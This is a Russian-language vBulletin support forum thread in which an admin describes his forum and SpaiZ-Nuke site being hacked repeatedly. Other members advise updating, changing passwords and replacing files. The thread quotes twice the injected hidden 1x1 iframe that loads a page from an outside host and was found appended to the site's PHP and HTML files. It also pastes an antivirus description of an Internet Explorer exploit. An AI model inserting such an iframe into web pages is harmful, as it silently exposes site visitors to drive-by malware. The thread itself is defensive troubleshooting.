Техническая поддержка форумов vBulletin
  форум vBSupport.ru > vBulletin > Old vB versions (3.0.x & 2.x.x) > vBulletin 3.5.x > vBulletin [3.5] Troubleshooting and Problems

exploit от step57.info - надо латать дыры

Register Меню vBsupport Изображения Files Manager О рекламе Today's Posts Search
  • Родная гавань
  • Блок РКН снят
  • Premoderation
  • For English speaking users
  • Каталог Фрилансеров
  • If you want to buy some product or script
  • Администраторам
VBsupport перешел с домена .ORG на родной .RU Ура! Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей

Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
for English speaking users:
You may be surprised with restriction of access to the attachments of the forum. The reason is the recent change in vbsupport.org strategy:

- users with reputation < 10 belong to "simple_users" users' group
- if your reputation > 10 then administrator (kerk, Luvilla) can decide to move you into an "improved" group, but only manually

Main idea is to increase motivation of community members to share their ideas and willingness to support to each other. You may write an article for the subject where you are good enough, you may answer questions, you may share vbulletin.com/org content with vbsupport.org users, receiving "thanks" equal your reputation points. We should not only consume, we should produce something.

- you may:
* increase your reputation (doing something useful for another members of community) and being improved
* purchase temporary access to the improved category:
10 $ for 3 months. - this group can download attachments, reputation/posts do not matter.
20 $ for 3 months. - this group can download attachments, reputation/posts do not matter + adds eliminated + Inbox capacity increased + files manager increased permissions.

Please contact kerk or Luvilla regarding payments.

Important!:
- if your reputation will become less then 0, you will be moved into "simple_users" users' group automatically.*
*for temporary groups (pre-paid for 3 months) reputation/posts do not matter.
Уважаемые пользователи!

На форуме открыт новый раздел "Каталог фрилансеров"

и отдельный раздел для платных заказов "Куплю/Закажу"

Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже:
Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота.
Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
 
Page 1 of 2 1 2
 
 
 
Mozg
Простоузер
Default exploit от step57.info - надо латать дыры
0
В общем пал смертью храбрых на пол дня форум 3.5.0 GOLD. Заходя на него выдавалось

Code:
Не удается добавить cookies. Header уже отправлен.
Файл: /home/zazanet/domains/zaza.net.ua/public_html/forum/includes/functions.php
Строка: 4672
Попав на фтп в эту строку нашел

Code:
<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>
и так почти все файлы php содержат этот код в самом низу после ?> + все index.html тоже с этим кодом.

Удалив код во всей папке forum....., ура заработал.

Но надо же закрывать дыры. Так же этот код пробрался в галерею.
При в ходе в админку писал как для модеров так и для админов

Get me out of this frame set!

Есть какие то предложения, по поводу латания дыры.

_step57.info здесь думаю есть этот сплойт.


ОФФТОП!!!!

Немного не по разделу, но со спайзом та же проблема. НО прописал себя только в однов файле (sPaiZ-Nuke v1.3.2 Lite Rus) config.php нашел


Код
Code:
<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>
Сам не мог попасть в админку. После ввода пароля, показывалось что буду перемещен через три секунды, после, опять оказывался на странице ввода пароля.

Удалил эту строчку и все стало на места

У кого спайз, я сабж отписал на форуме здесь
_http://spaiz-nuke.net/forums/index.php?act=ST&f=6&t=7908

думаю стоит обратить внимание и залотать дыру, если там канечно что то придумают.
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
 
 
kerk
k0t
 
kerk's Avatar
Default
0
Quote:
Originally Posted by Mozg
пал смертью храбрых на пол дня форум 3.5.0 GOLD.
хм... давно пора бы уже и обновить версию... =))
Quote:
Originally Posted by Mozg
думаю стоит обратить внимание и залотать дыру, если там канечно что то придумают
что придумывать? уже все придумали, все дырки известные закрыли в новых версиях =))
и еще..., никаких других незнакомых файлов на фтп не обнаружил?
 
 
Mozg
Простоузер
Default
0
Quote:
Originally Posted by kerk
и еще..., никаких других незнакомых файлов на фтп не обнаружил?
Чисто, левого ничего не заметил, смотрел по последним изменениям фалы, хотя у меня там их много, может что то и пропустил.

Уже удалил во всех файлах этот скрипт.
Появился глюк, при добалении быстрого ответа, он не как раньше из под низу стал добавляться, а с обнавлением экрана.
 
 
kerk
k0t
 
kerk's Avatar
Default
0
где то ты файлы JS повредил, когда удалял код, аякс у тебя перестал работать, похоже...
 
 
Mozg
Простоузер
Default
0
Quote:
Originally Posted by kerk
где то ты файлы JS повредил, когда удалял код, аякс у тебя перестал работать, похоже...
Подскажи какой файл глянуть. Я сравню с оригиналом.

Сегодня опять уроды хакнули, та же борода.
 
 
kerk
k0t
 
kerk's Avatar
Default
1
замени все файлы в папке clientscript на новые
и мне кажется у тебя троян живет на фтп...
 
 
Mozg
Простоузер
Default
0
Сегодян пользователи начали жаловаться на трояна

Exploit.HTML.Objdata
Другие названия
Exploit.HTML.Objdata («Лаборатория Касперского») также известен как: Exploit-ObjectData (McAfee), Trojan Horse (Symantec), Exploit.ObjectData (Doctor Web), Exploit:HTML/Objectdata* (RAV), HTML_OBJECTEXP.A (Trend Micro), PMS/Exploit.ObjData (H+BEDV), VBS:Malware (ALWIL), HTML.Daemonize.Loader.A (SOFTWIN), Exploit.HTML.ObjectData (ClamAV), Exploit/ObjectData (Panda) Описание опубликовано 01 июн 2004
Поведение Exploit, реализация уязвимости
Технические детали

Эксплоит, часто встречающийся (на момент добавления в антивирусные базы) в спамовых письмах.

Пытается использовать уязвимости Internet Explorer, описанные в Microsoft Security Bulletin MS03-032 и Microsoft Security Bulletin MS03-040.

Обе уязвимости имеют статус критических, поскольку позволяют исполнять на машине произвольный вредоносный код при простом посещении особым образом сконструированной HTML-страницы

Нашел фот эту гифку, я не помню что бы ложил ее туда, будет позже второй админ спрошу у него



После того как я вылечил и востановил рабту форума и портала(на спайзе) было где то 3 часа ночи, в 8 утра опять произошло зарожени, повторилась вся ситуация.

Мне кажется что используется сплойт для спайза _step57.info и уже через эту дыру заражается форум и все остальные фалй php и html, ведь галерея тоже заражена.

Как думаете вожможно ли что именно через дыру в спайзе все это происходит и устранив ее(пока не знаю как) перестанет заражаться и форум.
 
 
kerk
k0t
 
kerk's Avatar
Default
0
нюкой пользоваля давным-давно, и то не спайзом...
незнаю этот движок вообще, но скорей всего так и есть, что дырка в двиге сайта, а не форума
а форум обнови до последней версии
 
 
SAS1024
io.sys
 
SAS1024's Avatar
Default
0
Mozg,
1) смени все пароли
2) обнови SpaiZ-Nuke до последней версии
3) обнови воблу до последней версии
4) наслаждайся стабильной работой.
 
 
SADtg
Простоузер
Default
0
Возникла та же проблема, что и у Mozg. Пользователи жалуются на атаку троянов со страницы, при этом никакого кода в файлы не добавлено, стоит vb3.6.2 нуленная. Где происходит внедрение кода - ума не приложу :/
 
Page 1 of 2 1 2

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off



All times are GMT +4. The time now is 08:35 PM.

Contact Us - vBSupport.ru - Top

Powered by vBulletin® Version Ъ Edition
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.